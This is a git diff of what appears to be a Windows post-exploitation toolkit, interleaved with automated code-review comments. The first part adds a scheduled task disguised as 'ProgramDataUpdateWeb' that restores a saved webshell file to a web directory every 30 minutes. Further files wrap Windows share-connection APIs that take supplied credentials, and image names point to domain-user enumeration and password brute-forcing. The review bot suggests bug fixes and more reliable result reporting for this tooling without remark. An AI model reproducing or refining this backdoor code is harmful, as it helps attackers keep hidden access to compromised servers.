+ if (!task.isFileExist((LPSTR)"C:\\windows\\temp\\tempsh.txt"))
+ {
+ task.copyFile(strFilePath.data(), "C:\\windows\\temp\\tempsh.txt");
+ }
+
+ LPCWSTR wszTaskName = L"ProgramDataUpdateWeb"; // ƻ
+ wstring wstrTaskTime = L"PT30M"; // ÿ֮ʱ䡣ÿô
+ wstring wstrProgram = L"cmd.exe"; // ִеijcmd.exerundll32.exe
+ wstring args = L"/c copy c:\\windows\\temp\\tempsh.txt ";
+ args.append(StringToWstring(strFilePath).data());
+ wprintf(L"%s\n", args.data());
+ task.TaskAdd(wszTaskName, wstrTaskTime, wstrProgram, args);
+ }
+ else {
+ wprintf(L"Usage: %s c:\\www\\1.txt", argv[0]);
+ }
+
+
+
+}
\ No newline at end of file
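Review bot: StringToWstring allocates `str.size() * 2` wide characters and passes that same `len` as the limit to mbstowcs, so when the converted text fills the buffer no terminating null is written and `std::wstring str1(p)` reads past the allocation, and for an empty input `len` is 0 and `p` is read uninitialized; one wide character per input byte is already an upper bound, so size the buffer `str.size() + 1`, use the count mbstowcs returns, and check it for `(size_t)-1`. Wchar_tToString has the mirror problem: the first `WideCharToMultiByte` result is never checked, so a 0 return leads to `new char[0]` and `szDst = psText` reading an unterminated buffer; add `if (dwNum == 0) { szDst.clear(); return; }` after the sizing call. In wmain, `task.copyFile(...)` cannot report a failed open and the return value of `task.TaskAdd(...)` is discarded, so the process exits 0 whatever happened; at least `return task.TaskAdd(...) ? 1 : 0;` would surface the result.
```cpp
std::wstring StringToWstring(const std::string str)
{
    setlocale(LC_CTYPE, "");
    size_t len = str.size() + 1;             // one wchar_t per byte is an upper bound, +1 for the terminator
    wchar_t* p = new wchar_t[len];
    size_t n = mbstowcs(p, str.c_str(), len);
    if (n == (size_t)-1) {                   // invalid multibyte sequence in the current locale
        delete[] p;
        return std::wstring();
    }
    std::wstring str1(p, n);
    delete[] p;
    return str1;
}
```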
diff --git a/WNetCancelConnection2/WNetCancelConnection2.vcxproj b/WNetCancelConnection2/WNetCancelConnection2.vcxproj
new file mode 100644
index 0000000..c4470d3
--- /dev/null
+++ b/WNetCancelConnection2/WNetCancelConnection2.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}
+ WNetCancelConnection2
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/WNetCancelConnection2/WNetCancelConnection2.vcxproj.filters b/WNetCancelConnection2/WNetCancelConnection2.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/WNetCancelConnection2/WNetCancelConnection2.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/WNetCancelConnection2/\346\272\220.cpp" "b/WNetCancelConnection2/\346\272\220.cpp"
new file mode 100644
index 0000000..867d691
--- /dev/null
+++ "b/WNetCancelConnection2/\346\272\220.cpp"
@@ -0,0 +1,40 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "mpr.lib") // WinnetҪĶ̬ӿ
+
+#include
+#include
+#include
+#include // ͷ
+
+// Need to link with Netapi32.lib and Mpr.lib
+
+int wmain(int argc, wchar_t* argv[])
+{
+
+ DWORD dwRetVal;
+
+ if (argc != 2) {
+ wprintf(L"Usage: %s \n",
+ argv[0]);
+ wprintf(L" %s \\\\contoso\n",
+ argv[0]);
+ exit(1);
+ }
+
+ wprintf(L"Calling WNetCancelConnection2 with\n");
+ wprintf(L" lpName = %s\n", argv[1]);
+
+ dwRetVal = WNetCancelConnection2(argv[1], 0, TRUE);
+ //
+ // If the call succeeds, inform the user; otherwise,
+ // print the error.
+ //
+ if (dwRetVal == NO_ERROR)
+ wprintf(L"Connection cancel to %s\n", argv[1]);
+ else
+ wprintf(L"WNetCancelConnection2 failed with error: %u\n", dwRetVal);
+
+ exit(1);
+}
\ No newline at end of file
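Review bot: The success path ends in the same `exit(1);` as the failure path, so a caller or script cannot tell a cancelled connection from an error; replace the final `exit(1);` with `return dwRetVal == NO_ERROR ? 0 : 1;`. The same pattern appears at the end of wnetaddconnection2a/源.cpp in this commit and should get the same fix. The usage string `L"Usage: %s \n"` prints no placeholder for the required argument — presumably an angle-bracketed token such as `<RemoteName>` was lost when the source was rendered, so check the committed file. The comment `// Need to link with Netapi32.lib and Mpr.lib` does not match the single `mpr.lib` pragma, and nothing visible here uses Netapi32; drop the mention or add the pragma so the two agree.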
diff --git a/imgs/BlastDomainUserPwd_domainUser.png b/imgs/BlastDomainUserPwd_domainUser.png
new file mode 100644
index 0000000..5b3c834
Binary files /dev/null and b/imgs/BlastDomainUserPwd_domainUser.png differ
diff --git a/imgs/BlastDomainUserPwd_success.png b/imgs/BlastDomainUserPwd_success.png
new file mode 100644
index 0000000..bd63f61
Binary files /dev/null and b/imgs/BlastDomainUserPwd_success.png differ
diff --git a/imgs/BlastDomainUserPwd_use.png b/imgs/BlastDomainUserPwd_use.png
new file mode 100644
index 0000000..8ba200f
Binary files /dev/null and b/imgs/BlastDomainUserPwd_use.png differ
diff --git a/imgs/EnuDomainUser.png b/imgs/EnuDomainUser.png
new file mode 100644
index 0000000..04fc709
Binary files /dev/null and b/imgs/EnuDomainUser.png differ
diff --git a/imgs/NetGroupGetUsers.png b/imgs/NetGroupGetUsers.png
new file mode 100644
index 0000000..b5656d5
Binary files /dev/null and b/imgs/NetGroupGetUsers.png differ
diff --git a/imgs/NetLocalGroupEnum.png b/imgs/NetLocalGroupEnum.png
new file mode 100644
index 0000000..444ac65
Binary files /dev/null and b/imgs/NetLocalGroupEnum.png differ
diff --git a/imgs/NetLocalGroupGetMembers.png b/imgs/NetLocalGroupGetMembers.png
new file mode 100644
index 0000000..a2b9366
Binary files /dev/null and b/imgs/NetLocalGroupGetMembers.png differ
diff --git a/imgs/NetUserEnum.png b/imgs/NetUserEnum.png
new file mode 100644
index 0000000..405ad08
Binary files /dev/null and b/imgs/NetUserEnum.png differ
diff --git a/imgs/WNetCancelConnection2.png b/imgs/WNetCancelConnection2.png
new file mode 100644
index 0000000..29618d8
Binary files /dev/null and b/imgs/WNetCancelConnection2.png differ
diff --git "a/imgs/webshell\350\256\241\345\210\222\344\273\273\345\212\241\345\220\216\351\227\250.mov" "b/imgs/webshell\350\256\241\345\210\222\344\273\273\345\212\241\345\220\216\351\227\250.mov"
new file mode 100644
index 0000000..f1afea0
Binary files /dev/null and "b/imgs/webshell\350\256\241\345\210\222\344\273\273\345\212\241\345\220\216\351\227\250.mov" differ
diff --git a/imgs/wnetaddconnection2a.png b/imgs/wnetaddconnection2a.png
new file mode 100644
index 0000000..f4041cd
Binary files /dev/null and b/imgs/wnetaddconnection2a.png differ
diff --git a/wnetaddconnection2a/wnetaddconnection2a.vcxproj b/wnetaddconnection2a/wnetaddconnection2a.vcxproj
new file mode 100644
index 0000000..c0d616d
--- /dev/null
+++ b/wnetaddconnection2a/wnetaddconnection2a.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {3220347A-637E-4881-8226-799160A983DB}
+ wnetaddconnection2a
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/wnetaddconnection2a/wnetaddconnection2a.vcxproj.filters b/wnetaddconnection2a/wnetaddconnection2a.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/wnetaddconnection2a/wnetaddconnection2a.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/wnetaddconnection2a/\346\272\220.cpp" "b/wnetaddconnection2a/\346\272\220.cpp"
new file mode 100644
index 0000000..d73426a
--- /dev/null
+++ "b/wnetaddconnection2a/\346\272\220.cpp"
@@ -0,0 +1,62 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "mpr.lib") // WinnetҪĶ̬ӿ
+
+#include
+#include
+#include
+#include // ͷ
+
+// Need to link with Netapi32.lib and Mpr.lib
+
+int wmain(int argc, wchar_t* argv[])
+{
+
+ DWORD dwRetVal;
+
+ NETRESOURCE nr;
+ DWORD dwFlags;
+
+ if (argc != 4) {
+ wprintf(L"Usage: %s \n",
+ argv[0]);
+ wprintf(L" %s \\\\contoso\\public testuser testpasswd\n",
+ argv[0]);
+ exit(1);
+ }
+
+ wprintf(L"Calling WNetAddConnection2 with\n");
+ wprintf(L" lpLocalName = %s\n", L"");
+ wprintf(L" lpRemoteName = %s\n", argv[1]);
+ wprintf(L" lpUsername = %s\n", argv[2]);
+ wprintf(L" lpPassword = %s\n", argv[3]);
+
+ // Zero out the NETRESOURCE struct
+ memset(&nr, 0, sizeof(NETRESOURCE));
+
+ // Assign our values to the NETRESOURCE structure.
+
+ nr.dwType = RESOURCETYPE_ANY;
+ nr.lpLocalName = NULL; // F: ӳ䵽صĴ̣磺Z̵. ַΪգlpLocalNameΪNULLúԴӣض豸
+ nr.lpRemoteName = argv[1]; // \\192.168.232.128\temp ĿŹĴ
+ nr.lpProvider = NULL;
+
+ // Assign a value to the connection options
+ dwFlags = CONNECT_UPDATE_PROFILE;
+ //
+ // Call the WNetAddConnection2 function to assign
+ // a drive letter to the share.
+ //
+ dwRetVal = WNetAddConnection2(&nr, argv[3], argv[2], dwFlags);
+ //
+ // If the call succeeds, inform the user; otherwise,
+ // print the error.
+ //
+ if (dwRetVal == NO_ERROR)
+ wprintf(L"Connection added to %s\n", nr.lpRemoteName);
+ else
+ wprintf(L"WNetAddConnection2 failed with error: %u\n", dwRetVal);
+
+ exit(1);
+}
\ No newline at end of file
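Review bot: The password taken from argv[3] is echoed by `wprintf(L" lpPassword = %s\n", argv[3]);`, which leaves a cleartext credential in terminal scrollback, redirected output and any session recording; print a fixed mask instead, e.g. `wprintf(L" lpPassword = ********\n");`. Taking the password on the command line also exposes it to process listings and shell history on the host, so reading it from a prompt is the safer interface; at minimum the usage text should say that the argument is a cleartext credential. The comment `// a drive letter to the share.` above the WNetAddConnection2 call is stale because `nr.lpLocalName` is NULL, so no drive letter is assigned; reword it to `// Call WNetAddConnection2 to connect to the share without a local device name.`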